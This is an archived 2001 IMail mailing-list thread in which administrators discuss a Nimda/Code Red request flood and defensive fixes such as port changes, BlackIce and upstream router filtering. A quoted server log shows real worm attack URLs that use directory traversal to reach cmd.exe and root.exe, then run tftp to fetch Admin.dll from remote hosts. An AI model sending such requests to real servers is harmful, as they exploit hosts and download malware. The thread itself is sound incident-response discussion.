Sorry guys this was posted on wrong list by me... should have been here
rather then HKSI. here is the content of the email... as I think it will
help everyone here
Scot,
actually no I WAS talking about a different method. Each attack has a
specific signature in the header. These headers can be filtered out. Below
you will see the link to Cisco that will explain the procedured on thier
routers. Cisco routers can block any code red attack. While this does not
do much for your own network as far as bandwidith is concerned, if you get
your upstream provider to do it, they can prevent DOS attacks AND filter out
unwanted requests for roo*.*xe and programs like that.
Hope this helps
Todd
http://www.cisco.com/warp/public/63/nbar_acl_codered.shtml#2
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Scot Desort
Sent: Friday, September 21, 2001 11:30 AM
To: [EMAIL PROTECTED]
Subject: Re: [imail] DoS Attack on IMail Web Messaging?? HELP!
Unfortunately, the list of hosts compromised by this worm grows every
second. I think it would be physically impossible for upstreams to
continuously monitor traffic and add the single IP address of each
compromised host for each downstream customer. Just as soon as your upstream
blocked the IP's you were being attacked from, dozens if not hundreds more
got infected and will soon begin attacking. Someone else here said the list
of compromised hosts entering a single backbone was somewhere around 42,000
and growing.
(I assume that when you said "block all those requests", you were implying
blocking by source IP, and not some other method).
--
Scot
----- Original Message -----
From: "Todd Carew" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, September 21, 2001 11:23 AM
Subject: RE: [imail] DoS Attack on IMail Web Messaging?? HELP!
> Scot,
>
> I solved this problem by calling my upstream provider. I let them know
that
> I was being DoS'ed and we came up with a solution to block all of those
> requests right at the the border router for out subnets. This way not
only
> do they not make it to my machines, they dont make it through my pipe at
all
> and my bandwidth stays mine. I belive all upstream providers will be
> willing to do it
>
> good luck
>
> Todd
>
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> Scot Desort
> Sent: Friday, September 21, 2001 11:13 AM
> To: [EMAIL PROTECTED]
> Subject: Re: [imail] DoS Attack on IMail Web Messaging?? HELP!
>
>
> Charles:
>
> Some ideas:
>
> 1. Can you temporarily run web messaging on a different port number, like
81
> or 8383? It may be an inconvenience to inform your users, but the effect
of
> the attacks would stop instantly as the Code Red I/II/Nimda requests come
in
> on port 80, which would no longer be running on your server
>
> 2. Install something like BlackIce on the server. BlackIce will pick up
> these requests and block them from reaching the server, leaving your
> WebMessaging to run and process normal port 80 requests without the load
of
> the attack requests.
>
> Good luck
>
> --
> Scot
>
>
> ----- Original Message -----
> From: "Charles Short" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Friday, September 21, 2001 10:29 AM
> Subject: [imail] DoS Attack on IMail Web Messaging?? HELP!
>
>
>
>
> Hello,
>
> I know this message is long, but I called Ipswitch Support twice on
> Wednesday about a problem I am having with my IMail Server and the phone
> support I have gotten has not addressed my issue here and I need all the
> help I can get right now. I am running 7.03 HF1 on NT4 Server with SP6a. I
> am only running IMail on this machine. No IIS or other server programs.
>
>
>
> We started seeing problems on Tuesday like everyone else, but we are
> running IMail on a server by itself... No IIS. I am seeing a lot of
> malformed header requests in the logs like the Code Red I & II virus does
to
> IIS servers and -- this is the odd part -- some BRO*.tmp files in my spool
> directory that are most definitely being caused by people browsing
WebMail.
> It is causing web messaging to crawl, but other than that I have not seen
> what everyone else seems to be seeing with the Nimda virus. No other
> characteristics of the Nimda virus at all. I honestly do not believe that
we
> have been infected...
>
>
>
> Here is a snippet from the logs...
>
> ------------------------------
> 20010918 111401 208.180.242.21, , , GET
>
/scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dl
> l HTTP/1.0
> 20010918 111401 208.234.121.72, , , GET
>
/MSADC/root.exe?/c+tftp%20-i%20208.234.120.89%20GET%20Admin.dll%20Admin.dll
> HTTP/1.0
> 20010918 111401 205.218.122.146, , , GET
>
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20205.218.122.146%20GET%20Admin.dll%2
> 0d:\Admin.dll HTTP/1.0
> 20010918 111401 208.234.121.72, , , GET /MSADC/Admin.dll HTTP/1.0
> 20010918 111401 205.218.122.146, , , GET
>
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20205.218.122.146%20GET%20Admin.dll%2
> 0e:\Admin.dll HTTP/1.0
> 20010918 111401 208.168.189.178, , , GET
>
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.168.189.178%20GET%20Admin.dll%2
> 0d:\Admin.dll HTTP/1.0
> 20010918 111402 205.218.55.2, , , GET /scripts/Admin.dll HTTP/1.0
> 20010918 111402 208.168.64.117, , , GET
>
/scripts/root.exe?/c+tftp%20-i%20208.168.64.117%20GET%20Admin.dll%20Admin.dl
> l HTTP/1.0
> 20010918 111402 208.168.189.178, , , GET
>
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.168.189.178%20GET%20Admin.dll%2
> 0c:\Admin.dll HTTP/1.0
> 20010918 111402 208.27.235.69, , , GET
>
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%
> 20208.27.235.69%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
> 20010918 111402 205.197.162.130, , , GET
>
/MSADC/root.exe?/c+tftp%20-i%20205.197.162.132%20GET%20Admin.dll%20Admin.dll
> HTTP/1.0
> 20010918 111402 208.217.166.229, , , GET /d/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0
> 20010918 111402 208.168.189.178, , , GET
>
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.168.189.178%20GET%20Admin.dll%2
> 0e:\Admin.dll HTTP/1.0
> 20010918 111402 208.177.252.132, , , GET
>
/MSADC/root.exe?/c+tftp%20-i%20208.177.252.132%20GET%20Admin.dll%20Admin.dll
> HTTP/1.0
> 20010918 111402 208.234.121.72, , , GET /c/winnt/system32/cmd.exe?/c+dir
> HTTP/1.0
> 20010918 111402 208.168.171.3, , , GET
>
/scripts/root.exe?/c+tftp%20-i%20208.168.171.12%20GET%20Admin.dll%20Admin.dl
> l HTTP/1.0
> ------------------------------
>
> When I called the other day the assumption was that it was the Nimda
virus
> and the Ipswitch support guys said to run a virus program and reload the
web
> template files to fix it and that has done nothing at all to help. I even
> went ahead and made the upgrade from 6.06 to v.7.03 Wednesday night and no
> progress. I have all of the virus definitions for Norton and I've done
> SEVERAL system scans with Norton, House Call and the FIX_NIMDA.EXE program
> from Trend Micro and all came up empty handed. I just can't believe that
the
> Nimda has gotten into our system... Is anyone else seeing these BRO*.tmp
> files or is it just me?
>
>
>
> This seems to be a problem specific to IMail's Web Messaging program not
> properly filtering out these malformed request. When Web Messaging is off,
> the server runs like a dream. It is one thing to patch an IIS server with
a
> patch from the product vendor, but I honestly don't have a clue as to what
> else I can do to stop this DoS attack from happening on my IMail box
without
> implementing a firewall system for that server. I am seeing a ton of
> incoming traffic in our T1 logs so I know that it is coming in from the
> outside, but what I need to know is what can I do to make IMail filter out
> these requests? Help please.
>
>
>
> Charles Short
> [EMAIL PROTECTED]
> Systems Administrator
> Orotech
> Web Services
> http://www.orotech.net
> 910.350.7980 voice
> 910.350.7976 fax
>
>
>
>
>
>
> ______________________________________________________________________
> The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> To Manage your Subscription......... http://humankindsystems.com/lists
>
>
>
>
> ______________________________________________________________________
> The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> To Manage your Subscription......... http://humankindsystems.com/lists
>
______________________________________________________________________
The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
To Manage your Subscription......... http://humankindsystems.com/lists
______________________________________________________________________
The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
To Manage your Subscription......... http://humankindsystems.com/lists
advanced internet desktop: www.activatordesk.com
antivirus antispam email : www.activatormail.com
master internet index : www.infogrid.com
----- Copy of Original Message(s): -----
>>When Web Messaging is off, the server runs like a dream. It is one thing
>>to patch an IIS server with a patch from the product vendor, but I
>>honestly don't have a clue as to what else I can do to stop this DoS
>>attack from happening on my IMail box without implementing a firewall
>>system for that server.
R> That's what you have to do. No software can prevent a DoS attack that is
R> simply flooding the server with requests.
R> -Scott
Please visit http://www.ipswitch.com/support/mailing-lists.html
to be removed from this list.
An Archive of this list is available at:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Please visit http://www.ipswitch.com/support/mailing-lists.html
to be removed from this list.
An Archive of this list is available at:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
